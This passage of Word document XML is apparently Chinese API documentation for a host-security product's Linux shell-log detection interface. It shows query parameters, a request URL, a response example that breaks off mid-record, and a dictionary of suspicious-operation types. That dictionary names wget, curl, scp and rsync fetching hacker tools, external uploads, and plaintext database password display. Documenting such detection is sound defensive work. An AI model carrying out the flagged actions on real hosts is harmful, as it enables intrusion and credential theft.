            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C2CB8E3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14A80623" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D003972" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CA87DE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46F26580" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>审核状态：1-未审核；2-审核通过；3-审核未通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="689BDD1B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ABDD10E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F09D1D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56C3F115" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36049383" w14:textId="2F25EE72" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可疑操作类型，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "可疑操作类型" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>可疑操作类型</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="705CCE7B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E7E50D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EEF2D02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="089E595B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DD6B14E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>命令内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="772C84EC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="336A3A06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D40BD0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A0FFB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="467E526A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74E382AC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01F43877" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginUser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1126E1E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BB54F5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15B2513E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3552FA96" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="571907CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="764D4578" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D6F126B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7922563A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C02066B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B642EB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D614E11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78FCBA5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="128679F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04BD2339" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>可疑操作类型字典表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="446"/>
        <w:gridCol w:w="2381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F90213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6FCE7D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F5734C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3770F03F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7757F96C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0508A364" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未命中规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="230C272D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02BD6E37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3839F8D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>bash危险命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="350E8242" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2447B660" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E2C5039" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Wget下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="02010B3A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08A7F905" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F08DC88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>curl下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="424C2300" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D185DEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AD82D3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09C181F5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE7866C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="361CCBC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>scp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3802EC42" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA35B7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18F988D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rsync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23453DE6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="632E5F24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0504C6A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>MYSQL明文密码显示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7FB12CCC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32645C80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F3D59F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Mongo明文密码显示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C8A08B5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B1086AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="540B3200" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>scp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3C74A3FB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="667CF85E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63512E93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5B63E248" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C3A135" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="290C63F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rsync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0515C790" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21ECBF0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1269EF80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>赋给目录或文件危险权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F958C6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1738CC0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shelllog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F8C6C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEE484F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "b470f51011e3b7a9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.100.26",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.100.26",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.100.26",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localhost.localdomain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>logTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1521686548,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "cd /titan/agent",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
